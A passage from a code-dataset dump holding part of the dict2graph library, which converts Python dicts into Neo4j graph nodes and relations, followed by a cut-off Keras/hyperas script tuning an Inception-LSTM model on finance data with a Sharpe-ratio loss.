dict2graph.transformers._base import (\n _NodeTransformerBase,\n _RelationTransformerBase,\n)\nfrom dict2graph.transformers import Transformer\nfrom dict2graph.matcher_transformators_container import (\n MatcherTransformersContainer,\n MatcherTransformersContainerStack,\n)\n\n\nclass Dict2graph:\n \"\"\"\n The central class for dict2graph. Must be instanced to do get started and access the dict2graph api.\n\n **Class attributes**\n Dict2Graph has some basic options, packed into class attributes. You can change them after instantiating Dict2Graph.\n Usally you can go with the default values and dont need to change anything here.\n\n **example**\n\n ```python\n from dict2graph import Dict2graph\n\n d2g = Dict2graph()\n d2g.list_hub_additional_labels = [\"Collection\"]\n ```\n This will (later when parsing/transforming) add a label `Collection` to all list hubs\n\n\n Attributes:\n list_hub_additional_labels: Add these labels to list hub nodes. Defaults to `[\"ListHub\"]`.\n\n list_item_additional_labels: Add these labels to list item nodes. Defaults to `[\"ListItem\"]`.\n\n list_hub_id_property_name: A hub node has hash generated property based on its items.\n This is the name/key of the property. Defaults to `id`.\n\n list_item_relation_index_property_name: To preserve a json/dict list sequence,\n the index will be added to the relation from a list item node.\n This is the name/key of this property. 
Defaults to `_list_item_index`.\n\n        simple_list_item_data_property_name: A list of basic types like `[1,2,3]` will get the label from its parents,\n            but needs a default name/key for the value properties. Defaults to `_list_item_data`.\n\n        root_node_default_labels: Will be used as the root node label if no root node label can be captured\n            and no artificial root node labels (via `Dict2Graph.parse(root_node_labels)`) are provided. Defaults to `[\"Dict2GraphRoot\"]`.\n\n        root_node_default_id_property_name: The root node will have a primary key based on a hash of the dict input. This is the name/key for this property.\n\n        empty_node_default_id_property_name: To prevent all empty nodes from merging together when doing\n            `Dict2Graph.merge()`, they get a hash id by default.\n            This is the name/key for this property. Defaults to `id`.\n    \"\"\"\n\n    # Replacement strings {ITEM_PRIMARY_LABEL} and {ITEM_LABELs} are available\n    list_hub_additional_labels: List[str] = [\"ListHub\"]\n    list_item_additional_labels: List[str] = [\"ListItem\"]\n    list_hub_id_property_name: str = \"id\"\n    list_item_relation_index_property_name: str = \"_list_item_index\"\n\n    simple_list_item_data_property_name: str = \"_list_item_data\"\n    root_node_default_labels: List[str] = [\"Dict2GraphRoot\"]\n    root_node_default_id_property_name: str = \"id\"\n\n    empty_node_default_id_property_name: str = \"id\"\n\n    def __init__(\n        self,\n        create_ids_for_empty_nodes: bool = True,\n        interpret_single_props_as_labels: bool = True,\n    ):\n        \"\"\"\n        Usage:\n        ```python\n        from dict2graph import Dict2graph\n\n        d2g = Dict2Graph()\n        ```\n\n        Args:\n            create_ids_for_empty_nodes (bool, optional): When input dicts result in empty 'hub' nodes, this will artificially create key properties based on the child data. The key will be deterministic. Defaults to True.\n            interpret_single_props_as_labels (bool, optional): When having objects with a single property like `{\"animal\":{\"name\":\"dog\"}}`, `animal` will be interpreted as a label. If set to False, \"animal\" will result in an extra Node. 
Defaults to True.\n        \"\"\"\n        self.create_ids_for_empty_nodes = create_ids_for_empty_nodes\n\n        # Todo: \"interpret_single_props_as_labels\" should be a regular NodeTransformer instead of a class param\n        self.interpret_single_props_as_labels = interpret_single_props_as_labels\n\n        self._node_cache: List[Node] = []\n        self._node_cache_feeder: List[Node] = []\n\n        self._rel_cache: List[Relation] = []\n        self._rel_cache_feeder: List[Node] = []\n        self._nodeSets: Dict[Tuple, NodeSet] = {}\n        self._relSets: Dict[Tuple, RelationshipSet] = {}\n        self.matcher_and_node_transformers_stack = MatcherTransformersContainerStack([])\n        self.matcher_and_rel_transformers_stack = MatcherTransformersContainerStack([])\n\n    def add_transformation(\n        self,\n        transformer: Union[\n            _NodeTransformerBase,\n            _RelationTransformerBase,\n            List[Union[_NodeTransformerBase, _RelationTransformerBase]],\n        ],\n    ):\n        \"\"\"Add one or a list of [`Transformers`](/use_transformers.md) to the Dict2Graph instance.\n        Transformers can re-model your graph before writing it to a Neo4j database.\n\n        **usage**:\n        ```python\n        from dict2graph import Dict2graph, Transformer, NodeTrans\n\n        d2g = Dict2Graph()\n        d2g.add_transformation(\n            Transformer.match_nodes(\"article\").do(NodeTrans.OverrideLabel(\"book\"))\n        )\n        ```\n\n        Args:\n            transformer (Union[ _NodeTransformerBase, _RelationTransformerBase, List[Union[_NodeTransformerBase, _RelationTransformerBase]], ]): A list or single instance of a Transformer\n\n        \"\"\"\n\n        if isinstance(transformer, list):\n            for trans in transformer:\n                self.add_transformation(trans)\n            return\n        if self._get_transformer_class(transformer) == _NodeTransformerBase:\n            self.add_node_transformation(transformer)\n\n        elif self._get_transformer_class(transformer) == _RelationTransformerBase:\n            self.add_relation_transformation(transformer)\n        else:\n            raise ValueError(\n                f\"Expected transformer of subclass '{_NodeTransformerBase}' or '{_RelationTransformerBase}', got '{transformer.__class__}' (child of '{transformer.__class__.__bases__}')\"\n            )\n\n    def _get_transformer_class(\n        self, transformer: Union[_NodeTransformerBase, _RelationTransformerBase]\n    ) -> Union[Type[_NodeTransformerBase], Type[_RelationTransformerBase]]:\n        if issubclass(transformer.__class__, _NodeTransformerBase) and issubclass(\n            transformer.__class__, _RelationTransformerBase\n        ):\n            # We got a generic transformer. 
we have to look at the matcher to determine the transformer type.\n if isinstance(transformer.matcher, Transformer.RelTransformerMatcher):\n return _RelationTransformerBase\n elif isinstance(transformer.matcher, Transformer.NodeTransformerMatcher):\n return _NodeTransformerBase\n elif issubclass(transformer.__class__, _NodeTransformerBase):\n return _NodeTransformerBase\n elif issubclass(transformer.__class__, _RelationTransformerBase):\n return _RelationTransformerBase\n\n def add_node_transformation(\n self, transformer: Union[_NodeTransformerBase, List[_NodeTransformerBase]]\n ):\n if isinstance(transformer, list):\n for trans in transformer:\n self.add_node_transformation(trans)\n return\n if transformer.matcher is None:\n raise ValueError(f\"No matcher added to {transformer}\")\n if not issubclass(transformer.__class__, _NodeTransformerBase):\n raise ValueError(\n f\"Expected transformer of subclass '{_NodeTransformerBase}', got '{transformer.__class__}' (child of '{transformer.__class__.__bases__}').\\nMaybe you wanted to use function `Dict2graph.add_relation_transformation()` instead of `add_node_transformation`?\"\n )\n elif transformer.matcher.__class__ != Transformer.NodeTransformerMatcher:\n raise ValueError(\n f\"Expected transformer matcher of class '{Transformer.NodeTransformerMatcher}', got '{transformer.matcher.__class__}'.\\nMaybe you accidentally added a relationship matcher instead of a node matcher (`match_nodes()` vs. `match_rels()`) while using `Dict2graph.add_node_transformation()`?\"\n )\n else:\n transformer.d2g = self\n self.matcher_and_node_transformers_stack.add_container(transformer)\n\n def add_relation_transformation(\n self,\n transformer: Union[_RelationTransformerBase, List[_RelationTransformerBase]],\n ):\n if isinstance(transformer, list):\n for trans in transformer:\n self.add_relation_transformation(trans)\n return\n elif not issubclass(transformer.__class__, _RelationTransformerBase):\n raise ValueError(\n f\"Expected transformer of subclass '{_RelationTransformerBase}', got '{transformer.__class__}' (child of '{transformer.__class__.__bases__}').\\nMaybe you wanted to use function `Dict2graph.add_node_transformation()` instead of `add_relation_transformation`?\"\n )\n elif transformer.matcher.__class__ != Transformer.RelTransformerMatcher:\n raise ValueError(\n f\"Expected transformer matcher of class '{Transformer.RelTransformerMatcher}', got '{transformer.matcher.__class__}'.\\nMaybe you accidentally added a node matcher instead of a relationship matcher (`match_rels()` vs. `match_nodes()`) while using `Dict2graph.add_relation_transformation()`?\"\n )\n else:\n self.matcher_and_rel_transformers_stack.add_container(transformer)\n\n def parse(\n self, data: Dict, root_node_labels: Union[str, List[str]] = None\n ) -> \"Dict2graph\":\n \"\"\"Submit your actual data (as dict) to dict2graph. The data will be transformed instantly but not yet pushed to your Neo4j database.\n It will land in a dict2graph internal cache. 
You can run multiple `Dict2Graph.parse()` passes before pushing the data to your Neo4j database.\n\n **usage**\n ```python\n from dict2graph import Dict2graph\n # provide any dict that is json compatible (basic typed values and keys)\n data = {\"myDictKey\":\"myValue\"}\n d2g = Dict2Graph()\n d2g.parse(data)\n ```\n Args:\n data (Dict): Your data as a dict with only basic typed values; as a rule of thumb it should be json compatible.\n If you have a json string you may use the built-in python module \"json\" beforehand (`json.loads(your_data_as_json)`)\n root_node_labels (Union[str, List[str]], optional): Dict2graph tries to determine a sensible root node.\n But that is not possible in many cases and dict2graph\n will fall back to the default label in `Dict2graph.root_node_default_labels`.\n With `Dict2graph.parse(root_node_labels)` you can force a root label.\n Defaults to None.\n\n Raises:\n ValueError: When data is not parsable.\n\n Returns:\n Dict2graph: Returns itself to be able to chain commands like `dict2graph_inst.parse(data).parse(data2).create(NEO4J_DRIVER)`\n \"\"\"\n if root_node_labels is None:\n if isinstance(data, dict) and len(data.keys()) == 1:\n # we only have one key and therefore only one Node on the top-/root-level. We don't need a root Node to connect the top-level nodes.\n root_node_labels = [list(data.keys())[0]]\n data = data[root_node_labels[0]]\n else:\n root_node_labels = self.root_node_default_labels\n if isinstance(root_node_labels, str):\n root_node_labels = [root_node_labels]\n\n if isinstance(data, str):\n data_obj = json.loads(data)\n else:\n data_obj = data\n if not isinstance(data_obj, dict) and not isinstance(data_obj, list):\n raise ValueError(\n \"Expected json compatible object like a dict or list. got {}\".format(\n type(data_obj).__name__\n )\n )\n if isinstance(data_obj, dict):\n\n root_node = self._parse_traverse_dict_fragment(\n labels=root_node_labels, data=data_obj, parent_node=None\n )\n\n elif isinstance(data_obj, list):\n root_node = self._parse_traverse_list_fragment(\n labels=root_node_labels, data=data_obj, parent_node=None\n )\n self._prepare_root_node(root_node)\n\n self._flush_cache()\n return self\n\n def merge(\n self,\n graph: Union[Graph, Driver],\n database: str = None,\n create_merge_indexes: bool = True,\n ):\n \"\"\"Push the data to a Neo4j database, with a merge operation.\n\n **usage**\n ```python\n from dict2graph import Dict2graph\n from neo4j import GraphDatabase\n # provide any dict that is json compatible (basic typed values and keys)\n data = {\"car\":{\"wheels\":\"4\"}}\n data2 = {\"car\":{\"wheels\":\"4\"}}\n d2g = Dict2Graph()\n d2g.parse(data)\n d2g.parse(data2)\n d2g.merge(GraphDatabase.driver(\"neo4j://localhost\"))\n ```\n\n Will result in one node `(:car{wheels:4})` because the two datasets were merged (based on same labels and properties).\n\n Args:\n graph (Union[Graph, Driver]): A [`neo4j.GraphDatabase` instance](https://neo4j.com/docs/api/python-driver/current/)\n or a [`py2neo.Graph` instance](https://py2neo.org/2021.1/workflow.html#graph-objects)\n database (str, optional): Name of the Neo4j [database](https://neo4j.com/docs/cypher-manual/current/databases/). Defaults to None, which will be the default \"neo4j\" db.\n create_merge_indexes (bool, optional): Create indexes on the node merge keys before merging. 
Defaults to True.\n \"\"\"\n\n if create_merge_indexes:\n self.create_indexes_for_merge_keys(graph)\n for nodes in self._nodeSets.values():\n nodes.merge(graph, database=database)\n for rels in self._relSets.values():\n rels.merge(graph, database=database)\n\n def create(\n self,\n graph: Union[Graph, Driver],\n database: str = None,\n ):\n \"\"\"Push the data to a Neo4j database, with a create operation.\n\n **usage**\n ```python\n from dict2graph import Dict2graph\n from neo4j import GraphDatabase\n # provide any dict that is json compatible (basic typed values and keys)\n data = {\"car\":{\"wheels\":\"4\"}}\n data2 = {\"car\":{\"wheels\":\"4\"}}\n d2g = Dict2Graph()\n d2g.parse(data)\n d2g.parse(data2)\n d2g.create(GraphDatabase.driver(\"neo4j://localhost\"))\n ```\n\n Will result in two nodes `(:car{wheels:4})`.\n\n Args:\n graph (Union[Graph, Driver]): A [Neo4j python driver instance](https://neo4j.com/docs/api/python-driver/current/)\n or a [`py2neo.Graph` instance](https://py2neo.org/2021.1/workflow.html#graph-objects)\n database (str, optional): Name of the Neo4j [database](https://neo4j.com/docs/cypher-manual/current/databases/). Defaults to None, which will be the default \"neo4j\" db.\n \"\"\"\n for nodes in self._nodeSets.values():\n nodes.create(graph, database=database)\n for rels in self._relSets.values():\n rels.create(graph, database=database)\n\n def create_indexes_for_merge_keys(self, graph: Union[Graph, Driver]):\n for nodes in self._nodeSets.values():\n\n nodes.create_index(graph)\n\n def _prepare_root_node(self, node: Node):\n node.is_root_node = True\n if len(node.keys()) == 0:\n node[self.root_node_default_id_property_name] = node.get_hash(\n include_children_data=True\n )\n\n node.merge_property_keys = [self.root_node_default_id_property_name]\n\n def _parse_traverse_dict_fragment(\n self, data: Dict, parent_node: Node, labels: List[str] = None\n ) -> Node:\n new_node = Node(labels=labels, source_data=data, parent_node=parent_node)\n new_child_nodes: List[Node] = []\n new_rels: List[Relation] = []\n for key, val in data.items():\n if self._is_basic_attribute_type(val):\n # value is a simple type. attach as property to node\n new_node[key] = val\n else:\n # value is a dict or list in itself and therefore one or multiple child nodes\n r = None\n n = None\n if isinstance(val, dict):\n if self._is_named_obj(val):\n n = self._parse_traverse_dict_fragment(\n labels=list(val.keys()),\n data=val[list(val.keys())[0]],\n parent_node=new_node,\n )\n r = Relation(start_node=new_node, end_node=n, relation_type=key)\n else:\n n = self._parse_traverse_dict_fragment(\n labels=[key], data=val, parent_node=new_node\n )\n elif isinstance(val, list):\n n = self._parse_traverse_list_fragment(\n labels=[key], data=val, parent_node=new_node\n )\n elif val is not None:\n raise ValueError(\n f\"Expected dict val to be None, a basic type, a list or a dict. Got `{type(val)}` for key '{key}' value '{val}'\"\n )\n if n is not None:\n new_child_nodes.append(n)\n if r is None:\n r = Relation(\n start_node=new_node,\n end_node=n,\n )\n new_rels.append(r)\n self._node_cache.append(new_node)\n self._rel_cache.extend(new_rels)\n return new_node\n\n def _parse_traverse_list_fragment(\n self, labels: List[str], parent_node: Node, data: Dict\n ) -> Node:\n\n # create/set list root node. 
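(for example, parsing {\"tags\": [\"a\", \"b\"]} yields one 'tags' hub node with one child node per list item; the exact extra labels depend on list_hub_additional_labels)\n # 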
this is the node that the list items will attach to\n # the parent_node is the default root\n\n list_root_hub_node: Node = Node(\n labels=labels,\n source_data=data,\n parent_node=parent_node,\n )\n self._set_list_root_hub_node_labels(list_root_hub_node)\n list_root_hub_node.is_list_list_hub = True\n self._node_cache.append(list_root_hub_node)\n # parse nodes\n new_list_item_nodes: List[Node] = []\n for index, obj in enumerate(data):\n if self._is_basic_attribute_type(obj):\n n = Node(labels, source_data=obj, parent_node=list_root_hub_node)\n\n n[self.simple_list_item_data_property_name] = obj\n self._node_cache.append(n)\n new_list_item_nodes.append(n)\n elif self._is_named_obj(obj):\n obj_label = list(obj.keys())[0]\n obj_data = obj[obj_label]\n new_list_item_nodes.append(\n self._parse_traverse_dict_fragment(\n labels=[obj_label], data=obj_data, parent_node=list_root_hub_node\n )\n )\n elif isinstance(obj, dict):\n new_list_item_nodes.append(\n self._parse_traverse_dict_fragment(\n labels=labels, data=obj, parent_node=list_root_hub_node\n )\n )\n elif isinstance(obj, list):\n new_list_item_nodes.append(\n self._parse_traverse_list_fragment(\n labels=labels, data=obj, parent_node=list_root_hub_node\n )\n )\n\n # create relations to list root node\n child_ids: List[str] = []\n\n for index, node in enumerate(new_list_item_nodes):\n if node is None:\n continue\n self._set_list_item_node_labels(node)\n node.is_list_list_item = True\n child_ids.append(node.id)\n r = Relation(\n start_node=list_root_hub_node,\n end_node=node,\n )\n\n r[self.list_item_relation_index_property_name] = index\n node.parent_node = list_root_hub_node\n self._rel_cache.append(r)\n #\n\n list_root_hub_node[\n self.list_hub_id_property_name\n ] = list_root_hub_node.get_hash(include_children_data=True)\n list_root_hub_node.merge_property_keys = [self.list_hub_id_property_name]\n\n return list_root_hub_node\n\n def _is_empty(self, val):\n if not val:\n return True\n if isinstance(val, str) and val.upper() in [\"\", \"NULL\"]:\n return True\n return False\n\n def _is_basic_attribute_type(self, val):\n if isinstance(val, (str, int, float, bool)):\n return True\n else:\n return False\n\n def _is_named_obj(self, data: Dict):\n \"\"\"If an object is a one-keyed dict on the first layer and there is a dict behind this key,\n we determine that this one key is the label/type and the inner dict holds the props\n\n Args:\n data (Dict): The dict fragment to inspect\n\n Returns:\n bool: True if the single key should be interpreted as the label\n \"\"\"\n # {\"person\":{\"name\":\"tom\",\"lastname\":\"schilling\"}} -> we know it's a person\n # {\"name\":\"tom\",\"lastname\":\"schilling\"} -> Could be a person or a lama\n # {\"client\":{\"name\":\"tom\",\"lastname\":\"schilling\"},\"cert\":\"yes\"} -> Could be a person or a computer\n if not self.interpret_single_props_as_labels:\n return False\n if (\n isinstance(data, dict)\n and len(data.keys()) == 1\n and isinstance(data[list(data.keys())[0]], dict)\n ):\n return True\n return False\n\n def _set_list_root_hub_node_labels(self, node: Node) -> None:\n addi_labels = [\n l.replace(\"{{ITEM_PRIMARY_LABEL}}\", node.primary_label)\n for l in self.list_hub_additional_labels\n ]\n addi_labels = [\n l.replace(\"{{ITEM_LABELS}}\", \"_\".join(node.labels))\n for l in addi_labels\n ]\n\n node.labels = node.labels + addi_labels\n\n def _set_list_item_node_labels(self, node: Node) -> None:\n node.labels = node.labels + self.list_item_additional_labels\n\n def _manifest_node_from_cache(self, cached_node: Node):\n node_set: NodeSet = 
self._get_or_create_nodeSet(cached_node)\n if self.create_ids_for_empty_nodes and cached_node.id is None:\n cached_node[\n self.empty_node_default_id_property_name\n ] = cached_node.get_hash(include_children_data=True)\n cached_node.merge_property_keys = [self.empty_node_default_id_property_name]\n node_set.add_node(cached_node)\n\n def _get_or_create_nodeSet(self, node: Node) -> NodeSet:\n node_type_fingerprint = (\n frozenset(node.labels),\n frozenset(node.merge_property_keys),\n )\n if node_type_fingerprint not in self._nodeSets:\n self._nodeSets[node_type_fingerprint] = NodeSet(\n labels=node.labels,\n merge_keys=node.merge_property_keys\n if node.merge_property_keys\n else list(node.keys()),\n )\n return self._nodeSets[node_type_fingerprint]\n\n def _manifest_rel_from_cache(self, cached_relation: Relation):\n rel_set: RelationshipSet = self._get_or_create_relSet(cached_relation)\n rel_set.add_relationship(\n start_node_properties=cached_relation.start_node,\n end_node_properties=cached_relation.end_node,\n properties=cached_relation,\n )\n\n def _get_or_create_relSet(self, relation: Relation) -> RelationshipSet:\n rel_id = (\n frozenset(relation.start_node.labels),\n frozenset(relation.start_node.merge_property_keys),\n relation.relation_type,\n frozenset(relation.end_node.labels),\n frozenset(relation.end_node.merge_property_keys),\n )\n\n if rel_id not in self._relSets:\n self._relSets[rel_id] = RelationshipSet(\n rel_type=relation.relation_type,\n start_node_labels=relation.start_node.labels,\n end_node_labels=relation.end_node.labels,\n start_node_properties=relation.start_node.merge_property_keys,\n end_node_properties=relation.end_node.merge_property_keys,\n )\n return self._relSets[rel_id]\n\n def add_node_to_cache(self, node: Node):\n \"\"\"Add a new [dict2graph.Node][] to the dict2graph cache.\n This method is only relevant for [`Transformers`](/use_transformers).\n\n You will probably only need it if you create [custom Transformers](/diy_transformer).\n\n Args:\n node (Node): The [dict2graph.Node][] to add.\n \"\"\"\n self._node_cache_feeder.append(node)\n\n def add_rel_to_cache(self, rel: Relation):\n \"\"\"Add a new [dict2graph.Relation][] to the dict2graph cache.\n This method is only relevant for [`Transformers`](/use_transformers).\n\n You will probably only need it if you create [custom Transformers](/diy_transformer).\n\n Args:\n rel (Relation): The [dict2graph.Relation][] to add.\n \"\"\"\n self._rel_cache_feeder.append(rel)\n\n def _flush_cache(self):\n self._feed_cache_with_new_nodes_and_rels()\n self._run_transformations()\n for node in self._node_cache:\n if not node.deleted:\n self._manifest_node_from_cache(node)\n for rel in self._rel_cache:\n if not rel.deleted:\n self._manifest_rel_from_cache(rel)\n self._node_cache = []\n self._rel_cache = []\n\n def _run_transformations(self):\n for (\n matcher_trans_node_container\n ) in self.matcher_and_node_transformers_stack.containers:\n for node in self._node_cache:\n if (\n matcher_trans_node_container.matcher._match(node)\n and not node.deleted\n ):\n for trans in matcher_trans_node_container.transformers:\n trans._run_custom_node_match_and_transform(node)\n self._feed_cache_with_new_nodes_and_rels()\n\n for (\n matcher_trans_rel_container\n ) in self.matcher_and_rel_transformers_stack.containers:\n for rel in self._rel_cache:\n if matcher_trans_rel_container.matcher._match(rel) and not rel.deleted:\n for trans in matcher_trans_rel_container.transformers:\n trans._run_custom_rel_match_and_transform(rel)\n\n 
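# transformers may have queued new elements via add_node_to_cache() /\n # add_rel_to_cache(); fold the feeder caches back into the main caches\n 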
self._feed_cache_with_new_nodes_and_rels()\n\n def _feed_cache_with_new_nodes_and_rels(self):\n self._node_cache.extend(self._node_cache_feeder)\n self._node_cache_feeder = []\n self._rel_cache.extend(self._rel_cache_feeder)\n self._rel_cache_feeder = []\n","repo_name":"DZD-eV-Diabetes-Research/dict2graph","sub_path":"dict2graph/dict2graph.py","file_name":"dict2graph.py","file_ext":"py","file_size_in_byte":27347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"12377930869","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[4]:\n\n\n\n### load Data \nimport tensorflow as tf\nimport gzip\nfrom time import time\nfrom tensorflow.python.client import device_lib\nprint(device_lib.list_local_devices())\nimport keras as ks\nimport keras\nimport numpy as np\nimport keras.backend as K\nfrom random import random\nfrom random import randint\nfrom numpy import array\nfrom numpy import zeros\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Conv2D\nfrom tensorflow.keras.layers import MaxPooling2D\nfrom tensorflow.keras.layers import LSTM\nfrom tensorflow.keras.layers import Dense\nfrom tensorflow.keras.layers import Flatten\nfrom tensorflow.keras.layers import BatchNormalization\nfrom tensorflow.keras.layers import TimeDistributed\nfrom tensorflow.keras.layers import Conv1D\nfrom tensorflow.keras.layers import MaxPooling1D\nfrom tensorflow.keras.layers import AveragePooling1D\nfrom tensorflow.keras.callbacks import LambdaCallback\nfrom tensorflow.keras import optimizers\nfrom tensorflow.keras.layers import concatenate\nfrom tensorflow.keras.utils import plot_model\nfrom tensorflow.keras.models import Model\nfrom tensorflow.keras.layers import Input\nfrom tensorflow.keras.utils import multi_gpu_model\nimport multiprocessing\n#from eli5.sklearn import PermutationImportance\n#from numba import jit\nfrom tensorflow.keras.optimizers import Adam\nfrom tensorflow.keras.callbacks import EarlyStopping\nfrom tensorflow.keras.callbacks import ModelCheckpoint\n#from keras.callbacks import TensorBoard\nfrom hyperopt import Trials, STATUS_OK, tpe\nfrom hyperas import optim\nfrom hyperas.distributions import choice\nimport numpy as np\nimport pickle \nimport os\nfrom keras.preprocessing.sequence import TimeseriesGenerator\n\n\n# In[5]:\n\n\n\nimport multiprocessing\n#import dask.dataframe as dk\nimport pandas as pd\nimport numpy as np\nimport datetime as dt\n\n#import matplotlib.pyplot as plt\nidx=pd.IndexSlice\nfrom sklearn.metrics import make_scorer, r2_score,accuracy_score,precision_score\nfrom sklearn.externals import joblib\nimport os\nimport gc\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn import preprocessing\nfrom tqdm import tqdm\nimport inspect \n\n\n# In[6]:\n\n\n\nmultiprocessing.cpu_count()\n\n\n# In[ ]:\n\n\n\ndef data():\n readConfigForLoading=pd.read_csv('/beegfs/sr4376/Finance Data/LSTMResults/yearsBack/modelConfigInceptionLSTM100.csv')\n Year=readConfigForLoading['Year'][0]\n lookBackYear=readConfigForLoading['lookBackYear'][0]\n LSTMWindow = readConfigForLoading['LSTMWindow'][0]\n NumberOfFeatures = readConfigForLoading['NumberOfFeatures'][0]\n \n \n with gzip.open ('/beegfs/sr4376/Finance Data/LSTM/yearsBack/CNNFeatureYear' + str(Year) +'lookBackYear' +str(lookBackYear) + 'LSTMWindow' + str(LSTMWindow) + 'NumberOfFeatures' + str(NumberOfFeatures) + '.pklz', 'rb') as handle:\n X_train=pickle.load( handle)\n \n with gzip.open ('/beegfs/sr4376/Finance 
Data/LSTM/yearsBack/CNNTargetYear' + str(Year) +'lookBackYear' +str(lookBackYear) + 'LSTMWindow' + str(LSTMWindow) + 'NumberOfFeatures' + str(NumberOfFeatures) + '.pklz', 'rb') as handle:\n y_train=pickle.load( handle)\n\n \n #y_train=np.load('/beegfs/sr4376/Finance Data/hyperopt/hyperas/tempOpt/tempYtrainHyper5.pkl.npy')\n #X_test=np.load('/beegfs/sr4376/Finance Data/hyperopt/hyperas/tempOpt/tempXtestHyper5.pkl.npy')\n #y_test=np.load('/beegfs/sr4376/Finance Data/hyperopt/hyperas/tempOpt/tempYtestHyper5.pkl.npy')\n print(1)\n #, X_test, y_test\n return X_train, y_train\n\n\n# In[ ]:\n\n\ndef create_model(X_train, y_train):\n \n def inception_module(layer_in, f1, f2, f3):\n\n conv1 =TimeDistributed( Conv1D(f1, kernel_size=1, padding='same', activation='relu', kernel_initializer='glorot_normal'))(layer_in)\n \n conv3 =TimeDistributed( Conv1D(f2, kernel_size=1, padding='same', activation='relu', kernel_initializer='glorot_normal'))(layer_in)\n conv3 = TimeDistributed(Conv1D(f2, kernel_size=3, padding='same', activation='relu', kernel_initializer='glorot_normal'))(conv3)\n \n conv5 =TimeDistributed( Conv1D(f3, kernel_size=1, padding='same', activation='relu', kernel_initializer='glorot_normal'))(layer_in)\n conv5 = TimeDistributed(Conv1D(f3, kernel_size=5, padding='same', activation='relu', kernel_initializer='glorot_normal'))(conv5)\n \n pool = TimeDistributed(AveragePooling1D(pool_size=3, strides=1, padding='same'))(layer_in)\n pool =TimeDistributed( Conv1D(f1, kernel_size=1, padding='same', activation='relu', kernel_initializer='glorot_normal'))(pool)\n layer_out = concatenate([conv1, conv3, conv5, pool], axis=-1)\n return layer_out\n\n \n print(1)\n APPENDweights=[]\n size=377\n\n readConfigForLoading=pd.read_csv('/beegfs/sr4376/Finance Data/LSTMResults/yearsBack/modelConfigInceptionLSTM100.csv')\n length = readConfigForLoading['LSTMWindow'][0]\n n_features = readConfigForLoading['NumberOfFeatures'][0]\n def simple_sharpe_loss_function(y_actual,y_predicted):\n M=52\n M=K.cast(M,dtype='float32')\n sharpe_loss_value=K.mean(y_actual*y_predicted)/K.std(y_actual*y_predicted)*K.sqrt(M)\n return sharpe_loss_value\n #,'three','four','five','six','seven'\n visible = Input(shape=(None,n_features,1))\n layer=visible\n deepInceptionLayers={{choice(['one'])}}\n if deepInceptionLayers == 'one':\n NumberOfLayers=1\n elif deepInceptionLayers == 'two':\n NumberOfLayers=2\n elif deepInceptionLayers == 'three':\n NumberOfLayers=3\n elif deepInceptionLayers == 'four':\n NumberOfLayers=4\n elif deepInceptionLayers == 'five':\n NumberOfLayers=5\n elif deepInceptionLayers == 'six':\n NumberOfLayers=6\n elif deepInceptionLayers == 'seven':\n NumberOfLayers=7\n \n filter1D={{choice([1,3])}}\n filter3D={{choice([1,3])}}\n filter5D={{choice([1,3])}}\n# pool_size={{choice([ 1,2])}}\n momentum= 0.9\n for ii in np.arange(0,NumberOfLayers):\n layer = inception_module(layer, f1=filter1D, f2=filter3D, f3=filter5D)\n layer = TimeDistributed(BatchNormalization(momentum=momentum))(layer)\n# if {{choice(['one','two'])}} == 'one':\n# layer = TimeDistributed(MaxPooling1D(pool_size=pool_size))(layer)\n# else:\n# layer = TimeDistributed(AveragePooling1D(pool_size=pool_size))(layer)\n # 10,20,30,40 \n layer = TimeDistributed(Conv1D(1, kernel_size={{choice([20])}}, activation='relu', kernel_initializer='glorot_normal'))(layer)\n layer = TimeDistributed(Flatten())(layer)\n layer= LSTM(units={{choice([5,10,20,30,40,60,80,100,120])}}, 
kernel_initializer='glorot_normal',bias_initializer='glorot_normal',recurrent_dropout={{choice([0.1,0.2,0.3,0.4,0.5,0.6,0.7,0.8])}})(layer)\n if {{choice(['one','two'])}}=='one':\n layer = Dense(units={{choice([5,10,20])}},activation='relu',)(layer)\n layer = Dense(1, activation='linear')(layer)\n#dropout={{choice([0.1,0.2,0.3,0.4,0.5,0.6,0.7,0.8])}}\n model = Model(inputs=visible,outputs=layer) \n opt=Adam(lr={{choice([0.00001,0.0001,0.001,0.01,0.1])}},clipnorm={{choice([0.0001,0.001,0.01,0.1,1])}})\n model.compile(loss=simple_sharpe_loss_function, optimizer=opt)\n model.summary()\n es=EarlyStopping(monitor='val_loss',mode='min',verbose=1,patience=25)\n checkpoint = ModelCheckpoint('/beegfs/sr4376/Finance Data/LSTMResults/yearsBack/BestModel.hdf5', monitor='val_loss', verbose=1, save_best_only=True, mode='min',period=10) \n callback_List = [es, checkpoint]\n result=model.fit(X_train, y_train, batch_size=6000, epochs=5,callbacks = callback_List, validation_split=0.1,verbose=2)\n validation_acc = np.amin(result.history['val_loss'])\n print('Best validation acc of epoch:', -validation_acc)\n return {'loss': validation_acc,'status': STATUS_OK,'model':model}\n\n\n# In[ ]:\n\n\ndef continueToTrainModel(params):\n \n def inception_module(layer_in, f1, f2, f3):\n\n conv1 =TimeDistributed( Conv1D(f1, kernel_size=1, padding='same', activation='relu', kernel_initializer='glorot_normal'))(layer_in)\n \n conv3 =TimeDistributed( Conv1D(f2, kernel_size=1, padding='same', activation='relu', kernel_initializer='glorot_normal'))(layer_in)\n conv3 = TimeDistributed(Conv1D(f2, kernel_size=3, padding='same', activation='relu', kernel_initializer='glorot_normal'))(conv3)\n \n conv5 =TimeDistributed( Conv1D(f3, kernel_size=1, padding='same', activation='relu', kernel_initializer='glorot_normal'))(layer_in)\n conv5 = TimeDistributed(Conv1D(f3, kernel_size=5, padding='same', activation='relu', kernel_initializer='glorot_normal'))(conv5)\n \n pool = TimeDistributed(AveragePooling1D(pool_size=3, strides=1, padding='same'))(layer_in)\n pool =TimeDistributed( Conv1D(f1, kernel_size=1, padding='same', activation='relu', kernel_initializer='glorot_normal'))(pool)\n layer_out = concatenate([conv1, conv3, conv5, pool], axis=-1)\n return layer_out\n\n \n print(1)\n APPENDweights=[]\n size=377\n #,'two','three','four','five','six','seven'\n clipnormToChoice = [0.0001,0.001,0.01,0.1,1,10]\n deepInceptionLayersToPick = ['one']\n filter1D = [1,3]\n filter1D_1 = [1,3]\n filter1D_2 = [1,3]\n kernel_size = [2]\n learningRateToChoice = [0.00001,0.0001,0.001,0.01,0.1,1]\n# pool_size = [1]\n# pool_stride = [1]\n\n recurrent_dropout = 